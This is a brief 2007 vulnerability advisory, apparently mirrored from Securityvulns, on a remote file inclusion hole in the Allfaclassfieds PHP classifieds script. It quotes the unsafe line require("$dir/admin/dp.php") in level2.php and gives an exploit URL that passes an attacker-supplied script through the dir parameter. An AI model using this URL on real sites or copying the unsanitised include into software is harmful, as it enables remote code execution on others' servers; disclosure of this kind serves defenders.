Lucene search
SecurityvulnsSECURITYVULNS:DOC:16820HistoryApr 24, 2007 - 12:00 a.m.
Allfaclassfieds (level2.php dir) remote file inclusion
2007-04-2400:00:00
vulners.com
18
Allfaclassfieds (level2.php dir) remote file inclusion
–
Bug Found By Dr.RoVeR –>Arab48 Hacker
Contact: [email protected]
Script: allfaclassfieds
Download: http://scriptat.com/download.php?sid=718
Bug File: level2.php
Bug code in line 4:
require("$dir/admin/dp.php");
–
Exploit:
http://site.com/[path]/admin/setup/level2.php?dir=[EvilScript]
–
Get your free email from http://www.hackermail.com